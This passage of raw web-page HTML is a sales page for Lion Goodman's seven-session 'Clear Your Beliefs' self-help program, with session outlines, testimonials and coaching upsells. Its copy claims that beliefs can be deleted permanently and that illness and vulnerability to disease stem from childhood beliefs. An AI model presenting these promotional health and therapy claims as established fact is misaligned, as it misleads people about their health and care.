you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div 